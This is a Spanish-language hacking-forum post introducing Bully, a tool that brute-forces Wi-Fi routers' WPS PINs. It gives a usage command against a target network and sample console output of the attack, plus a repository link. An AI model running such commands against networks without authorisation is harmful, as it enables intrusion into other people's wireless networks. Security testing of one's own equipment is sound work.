Underc0de

[In]Seguridad Informática => Hacking => Hacking Tools => Mensaje iniciado por: ANTRAX en Octubre 28, 2019, 12:17:31 PM

Título: Bully - Ataques a redes con WPS
Publicado por: ANTRAX en Octubre 28, 2019, 12:17:31 PM
(https://kali-linux.net/wp-content/uploads/2017/05/bully6-730x338.png)

Bully es una implementación del ataque de fuerza bruta al protocolo WPS, escrito en C.

Es conceptualmente identico a otros programas, en tal caso, explota la vulnerabilidad del pin WPS.

Contiene varias ventajas sobre el código original de Reaver. Incluye algunas dependencias, optimización de memoria, rendimiento del cpu y un conjunto robusto de configuracines.

Corren en Linux y fue desarrollado para ejecutarse en sistemas embebidos (OpenWrt, Ddwrt, etc) independiente de la arquitectura.

Forma de uso:

Atacar el ESSID (-e 6F36E6) con la interfaz en modo monitor (mon0): bully -e 6F36E6 mon0

Código (text) [Seleccionar]
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[X] Unknown frequency '-113135872' reported by interface 'mon0'
[!] Using '00:1f:33:f3:51:13' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '6F36E6' on channel 'unknown'
[+] Got beacon for '6F36E6' (9c:d3:6d:b8:ff:56)
[+] Switching interface 'mon0' to channel '8'
[!] Beacon information element indicates WPS is locked
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '54744431'


Repo GitHub: https://github.com/aanarchyy/bully